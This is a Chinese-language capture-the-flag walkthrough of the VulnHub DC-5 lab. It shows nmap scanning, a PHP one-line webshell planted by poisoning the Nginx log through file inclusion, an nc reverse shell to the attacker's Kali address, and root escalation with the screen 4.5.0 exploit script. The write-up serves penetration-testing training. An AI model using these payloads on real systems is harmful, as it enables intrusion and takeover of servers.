一、环境搭建
DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip
kali:192.168.144.148
DC-5:192.168.144.153
二、渗透流程
nmap -T5 -p- -sV -sT -A 192.168.144.15
![](https://img-blog.csdnimg.cn/c0122674b53e47d691f98d57e11ad80b.png#pic_center)
思路:
开放端口是80、36888
访问web页面:
网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;
……
1.访问http://192.168.144.153,点击contact页面
2.burpsuite抓取请求包
![](https://img-blog.csdnimg.cn/f408c4edaded4b91bca41ea36030d78c.png#pic_center)
3.路径存在文件包含
1.利用文件包含写入一句话木马
<?php eval($_POST['cmd']);?>
![](https://img-blog.csdnimg.cn/8b304f3acf9f41a5b30ef792fb2a69e2.png#pic_center)
2.利用文件包含使上传的文件以PHP格式执行
用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行
file=/var/log/nginx/error.log&cmd=ls
![](https://img-blog.csdnimg.cn/fc2a7ff3647c4d158e950621f242a8ea.png#pic_center)
3.nc 反弹shell
file=/var/log/nginx/error.log&cmd=nc -e /bin/sh 192.168.144.148 4444
![](https://img-blog.csdnimg.cn/2a00391a56d043a9b9e4ff2955e1e5a2.png#pic_center)
4.使用python生成交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
![](https://img-blog.csdnimg.cn/afc56b1497c64e229b602c68b89e7caf.png#pic_center)
1.查找以root权限运行的组件
find / -perm -4000 2>/dev/null
![](https://img-blog.csdnimg.cn/249a183dcf5c4f58938ecd3c432bd9b1.png#pic_center)
2.寻找screen 4.5.0相关漏洞
searchsploit screen 4.5.0
![](https://img-blog.csdnimg.cn/740c8456497d43d68c3c2c8c4aedf580.png#pic_center)
3.漏洞利用
将漏洞利用脚本复制到当前目录
:
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
将如下内容写入libhax.c中,然后gcc编译
:
vim libhax.c
gcc -fPIC -shared -ldl -o libhax.so libhax.c
![](https://img-blog.csdnimg.cn/da89a6b38900430196ca2d2f5b046ee5.png#pic_center)
将如下内容写入rootshell.c中,然后gcc编译
:
![](https://img-blog.csdnimg.cn/ab5a37e82bb24fcdb2566f7ffd216e1f.png#pic_center)
vim rootshell.c
gcc -o rootshell rootshell.c
![](https://img-blog.csdnimg.cn/e52eb83b8bbf4dac8ec3f43a4bf070e1.png#pic_center)
将如下内容写入dc5.sh
:
vim dc5.sh
![](https://img-blog.csdnimg.cn/fc955ee5640746128f66ad52fa9a53f6.png#pic_center)
4.获取root权限
将刚刚生成的文件通过蚁剑上传到/tmp目录
:
![](https://img-blog.csdnimg.cn/996b8740536946028c1c27bc22510803.png#pic_center)
cd /tmp
chmod +x dc5.sh
ls -l
./dc5.sh
cd /root